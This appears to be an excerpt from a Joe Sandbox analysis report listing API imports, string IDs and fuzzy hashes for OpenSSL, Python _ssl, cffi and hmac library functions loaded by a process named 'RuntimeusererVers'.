                                                                                                                                                                                                                                          • ERR_clear_error.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E05FF
                                                                                                                                                                                                                                          • ASN1_item_d2i.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E061E
                                                                                                                                                                                                                                          • ASN1_TYPE_get.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E063B
                                                                                                                                                                                                                                          • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E06EE
                                                                                                                                                                                                                                          • EVP_PKEY_CTX_free.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E0744
                                                                                                                                                                                                                                          • ASN1_item_free.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E0753
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 00007FF81E0988C9
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: memset.VCRUNTIME140 ref: 00007FF81E0988F7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: memcpy.VCRUNTIME140 ref: 00007FF81E098933
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E098956
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E0989BD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E098A38
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free$E_getN1_item_d2iN1_item_freeO_mallocR_clear_errorX509_get0_pubkeyX_ctrlX_freeX_newmemcpymemset
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\statem\statem_srvr.c$Q
                                                                                                                                                                                                                                          • API String ID: 2622237655-4085857157
                                                                                                                                                                                                                                          • Opcode ID: 29b83a6a0e9b2dcd0b987ecca7b7a48fca6c18b4ebd350d10a0bdae3980f98aa
                                                                                                                                                                                                                                          • Instruction ID: 6c890b1df8e24c20514fdf068402e7858b0f48e13f007a9657f881c062b29194
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29b83a6a0e9b2dcd0b987ecca7b7a48fca6c18b4ebd350d10a0bdae3980f98aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58617E72A08F4685EE60DB56E440BBA6790FF84BE4F144236EA8D477A5DF3CF9458B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Arg_FormatParse_SizeStringWarnX_ctrl
                                                                                                                                                                                                                                          • String ID: The context's protocol doesn't support modification of highest and lowest version.$Unsupported TLS/SSL version 0x%x$Unsupported protocol version 0x%x$ssl.TLSVersion.SSLv3 is deprecated$ssl.TLSVersion.TLSv1 is deprecated$ssl.TLSVersion.TLSv1_1 is deprecated
                                                                                                                                                                                                                                          • API String ID: 1675272777-3879554506
                                                                                                                                                                                                                                          • Opcode ID: 97aac6f85bb5bd767cdf60e76b43fb043aeb39cee9ba4b47f94ecca7f189989c
                                                                                                                                                                                                                                          • Instruction ID: 06e936b870206f9fa49fcc0a4ab58a83c72f68c037d150185f952e9c23a3b06f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97aac6f85bb5bd767cdf60e76b43fb043aeb39cee9ba4b47f94ecca7f189989c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A413021B1CD1285FA744B2AD854E352260BF417F2FA44331D91E42EE8EE6DFEC59701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_$Err_Release$String$BufferContiguousFormatObject_
                                                                                                                                                                                                                                          • String ID: contiguous buffer expected$expected a pointer or array ctype, got '%s'$right operand length must match slice length
                                                                                                                                                                                                                                          • API String ID: 917851491-2344006768
                                                                                                                                                                                                                                          • Opcode ID: 492111c2bbd31e5275ce7ca080d06e27dd642f4512c10dab5b2d19e8721f73c9
                                                                                                                                                                                                                                          • Instruction ID: d22bee8431cec0d6ce6ef1f953a488d7f7e386228950af26c2b4294d56d4a2dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 492111c2bbd31e5275ce7ca080d06e27dd642f4512c10dab5b2d19e8721f73c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6541FA36A08E42C2EA24CB15ED601B973A0FF88BE4B984732E95E436A4DF7DF545C741
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String$DeallocMem_$FormatFreeMallocUnicode_memcpy
                                                                                                                                                                                                                                          • String ID: password cannot be longer than %d bytes$unable to allocate password buffer
                                                                                                                                                                                                                                          • API String ID: 1570515377-2395793021
                                                                                                                                                                                                                                          • Opcode ID: 2b432fb3dce652f42f2c7472e24a173b684e3d89a83873c8256b8d33ac990114
                                                                                                                                                                                                                                          • Instruction ID: 39d4c23dc07b17b30934ae12762961f45a9727c72cb2bbc750c043b80c28a983
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b432fb3dce652f42f2c7472e24a173b684e3d89a83873c8256b8d33ac990114
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD414931A09E42C6FA249B16E944139B7A5FB85FF2B494632CE1E47B94DF3CF4948300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String$Module_State
                                                                                                                                                                                                                                          • String ID: Missing required parameter 'digestmod'.$key is too long.
                                                                                                                                                                                                                                          • API String ID: 450183790-3184708805
                                                                                                                                                                                                                                          • Opcode ID: 20a4f4cc56f4df26beb6afd7a31a18035a1c8236dd24386be64b70811f72101a
                                                                                                                                                                                                                                          • Instruction ID: 82739752506c284a4e24c6b1d3bbb7828534f31ef8d94971f5e7ed95c5dfdcd9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20a4f4cc56f4df26beb6afd7a31a18035a1c8236dd24386be64b70811f72101a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A413D21E08F4385EA54DB16A858A79A3A1AF84FF0F484231DE5D47B64EF7CF4E58340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format$AddressArg_ErrorLastParseProcSizeTuple___stdio_common_vsprintf
                                                                                                                                                                                                                                          • String ID: O!s:load_function$error 0x%x$function or pointer or array cdata expected, got '%s'$function/symbol '%s' not found in library '%s': %s$library '%s' has already been closed
                                                                                                                                                                                                                                          • API String ID: 1100265670-2543733793
                                                                                                                                                                                                                                          • Opcode ID: 3b97bb430ce2eb91d41ab64e4e1557df8f611ed7a621dc6a7b739cfdd32b130e
                                                                                                                                                                                                                                          • Instruction ID: 77a4bf42fe2cd9a34f9f63d7d76ce6943dae9bc770317b97aede51eb5026bd3c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b97bb430ce2eb91d41ab64e4e1557df8f611ed7a621dc6a7b739cfdd32b130e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4313C65A08E42C1EB08DB65EC603E9A3A0FF84BE4F441636E94D47665EF7CF499C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Object_$ClearRefsWeak$Buffer_ErrorFatalFuncReleaseTrack
                                                                                                                                                                                                                                          • String ID: cdata CDataOwningGC_Type with unexpected type flags$cdataowninggc_dealloc
                                                                                                                                                                                                                                          • API String ID: 2692969411-3398618105
                                                                                                                                                                                                                                          • Opcode ID: 13503a3c68720f0aa0e85bed88528fcca7d266cab3b43b27fb4dff52ce363361
                                                                                                                                                                                                                                          • Instruction ID: e14e5c4084ebf65d4279ffb427acce12de5154f32a499bd704f5616396861307
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13503a3c68720f0aa0e85bed88528fcca7d266cab3b43b27fb4dff52ce363361
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C31B836A08E46C2EB589F66ED642B827A4FB88BF5F155231DA4E06764CF3DF4558300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: T_free$P_resp_count$E_freeL_sk_new_nullP_freeP_get1_ext_d2iP_resp_get0P_response_get1_basicR_put_errorX509_get_ext_d2id2i_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2393059476-0
                                                                                                                                                                                                                                          • Opcode ID: 76fd3bcacf334f1c2470ec69d84b8f21cf506a49e8396b11a5fe56694b7effb4
                                                                                                                                                                                                                                          • Instruction ID: 52e11576042504ef837a07b1ed79502e1e4e7a579b018138be1d84e2eda075e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76fd3bcacf334f1c2470ec69d84b8f21cf506a49e8396b11a5fe56694b7effb4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B41C211F09F4B42EE649AA660597BAA391BF94BE4F040234EE4E477C2EF7DF9018750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$X509_get0_pubkey
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                          • API String ID: 2083351937-2723262194
                                                                                                                                                                                                                                          • Opcode ID: ebe6d218d256f2b93a931c41f9664656afb9b2d4bbfeeb00eff9d52bac07fb99
                                                                                                                                                                                                                                          • Instruction ID: b7fca694529d8e03d294f6dcd4c3ddf878e41be6dd25e938122fb33aa1529227
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebe6d218d256f2b93a931c41f9664656afb9b2d4bbfeeb00eff9d52bac07fb99
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2414036A08E4681EF04EB55E4406B9A760FB98BD8F440232EB4D43759EF7DE546CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyEval_SaveThread.PYTHON311(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517B7F
                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517B8E
                                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517B9F
                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517BBC
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517BC5
                                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517BCB
                                                                                                                                                                                                                                          • PyEval_RestoreThread.PYTHON311(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517BE7
                                                                                                                                                                                                                                          • PyUnicode_AsUTF8.PYTHON311(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517BFB
                                                                                                                                                                                                                                          • PyErr_Format.PYTHON311(?,?,00000000,00007FF81E518D02), ref: 00007FF81E517C12
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadValue$Err_ErrorFormatLastRestoreSaveUnicode__errnomalloc
                                                                                                                                                                                                                                          • String ID: global variable '%s' is at address NULL
                                                                                                                                                                                                                                          • API String ID: 1246478879-1611533540
                                                                                                                                                                                                                                          • Opcode ID: 613b43c23a1dd06fbf1a189d68e530bce7eef0815385b11672669b28b0490deb
                                                                                                                                                                                                                                          • Instruction ID: 226fea9174d98fe49352bfcc21e1a9f3f73ea043ad337872dc52fe0171414d70
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 613b43c23a1dd06fbf1a189d68e530bce7eef0815385b11672669b28b0490deb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43213E25A19F4282EA48DF25FC641A863A0FF8DBE4B084634DE1E4B765FF2CF5958700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Digest$UpdateX_free$D_sizeFinalR_flagsSignX_cipherX_copyX_mdX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 109953546-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast_errnomalloc$ReleaseState_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3175917953-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$ErrorLastM_freeM_growR_clear_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem.c
                                                                                                                                                                                                                                          • API String ID: 2562538362-2512360314
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EVP_MD_size.LIBCRYPTO-1_1(?,?,?,?,?,00000374,00000000,?,00007FF81E0EC94F), ref: 00007FF81E0EA7D1
                                                                                                                                                                                                                                          • EVP_CIPHER_flags.LIBCRYPTO-1_1(?,?,?,?,?,00000374,00000000,?,00007FF81E0EC94F), ref: 00007FF81E0EA839
                                                                                                                                                                                                                                          • EVP_CipherInit_ex.LIBCRYPTO-1_1(?,?,?,?,?,00000374,00000000,?,00007FF81E0EC94F), ref: 00007FF81E0EA964
                                                                                                                                                                                                                                          • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1(?,?,?,?,?,00000374,00000000,?,00007FF81E0EC94F), ref: 00007FF81E0EA97B
                                                                                                                                                                                                                                          • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1(?,?,?,?,?,00000374,00000000,?,00007FF81E0EC94F), ref: 00007FF81E0EA997
                                                                                                                                                                                                                                          • OPENSSL_cleanse.LIBCRYPTO-1_1(?,?,?,?,?,00000374,00000000,?,00007FF81E0EC94F), ref: 00007FF81E0EAA00
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_ctrl$CipherD_sizeInit_exL_cleanseR_flags
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\tls13_enc.c$key
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlO_freeO_newO_s_fileR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_ModuleModule_StateType_$CheckErr_KeywordsLong_OccurredPositional
                                                                                                                                                                                                                                          • String ID: _SSLContext
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$FreeMem_Object_Track
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocX_free$Bytes_DigestErr_FinalFromMemorySizeStringX_copyX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3259613670-0
                                                                                                                                                                                                                                          • Opcode ID: b140d61363fd0dff1f397f187392c31c8497dfb576154a2f6fc7d00117bf2914
                                                                                                                                                                                                                                          • Instruction ID: 65b6d880a67f7bd354cb692cea14f8a444b27056f4b4b66bf512dd9f041c70c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b140d61363fd0dff1f397f187392c31c8497dfb576154a2f6fc7d00117bf2914
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B211921F09F4385EB54DB22A958839A3A1AF89FF0F085630DE4F46750EE2CF4B58744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Long_SignSubtypeType_
                                                                                                                                                                                                                                          • String ID: integer/float conversion failed$integer/float expected
                                                                                                                                                                                                                                          • API String ID: 3148124222-1774177493
                                                                                                                                                                                                                                          • Opcode ID: fa0394812f82a9e9ea30a07d0c7af7266ef641eb2908b4f30ed029beba5d8861
                                                                                                                                                                                                                                          • Instruction ID: 670d1cd6d030d8c6750346419c1e9a4a32e5fd1f78525f793579d6587aa16038
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0394812f82a9e9ea30a07d0c7af7266ef641eb2908b4f30ed029beba5d8861
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D515172B09E42C2EA59AB25DC612B91391BF45BF4F085336FA4E57794DF2CF8918300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: , value=$..\s\ssl\ssl_conf.c$cmd=
                                                                                                                                                                                                                                          • API String ID: 1767461275-2539137415
                                                                                                                                                                                                                                          • Opcode ID: 6f5fa976fdc21c662024ae26816687f03e4be8bcdd26a407f4cb266dff922d12
